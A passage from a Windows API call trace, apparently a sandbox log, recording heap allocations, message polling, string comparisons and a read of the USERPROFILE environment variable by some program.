(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0168.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0168.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0168.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0168.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0168.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0168.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0168.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1a) returned 0x2a77ee0 [0168.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0168.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IconCache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0168.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="conCache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0168.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="onCache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0168.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nCache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0168.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0168.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ache.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0168.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="che.db", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0168.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0168.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0168.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0168.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0168.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0168.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0168.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0168.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0168.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0168.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0168.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0168.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0168.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0168.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0168.700] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0168.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0168.700] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0168.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0168.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0168.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0168.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0168.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0168.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0168.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0168.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0168.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0168.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0168.701] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0168.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0168.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0168.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0168.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0168.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0168.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa708 [0168.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0168.701] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0168.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0168.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0168.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0168.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0168.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0168.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0168.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0168.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0168.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0168.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0168.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0168.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0168.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0168.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0168.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0168.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0168.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0168.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0168.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0168.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0168.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0168.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0168.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0168.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0168.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0168.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0168.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0168.702] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0168.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0168.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0168.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa648 [0168.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0168.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0168.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa660 [0168.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0168.703] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0168.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0168.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0168.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0168.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0168.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0168.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0168.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0168.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0168.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0168.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0168.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0168.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0168.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0168.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0168.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0168.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0168.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0168.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0168.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0168.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72708 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0168.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a726a8 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0168.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa660 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0168.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0168.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0168.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0168.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0168.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0168.705] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0168.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0168.705] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0168.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0168.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0168.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0168.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0168.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0168.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0168.706] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0168.706] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0168.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0168.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0168.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0168.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0168.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0168.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0168.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.707] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0168.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0168.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0168.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0168.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.707] RtlAllocateHeap 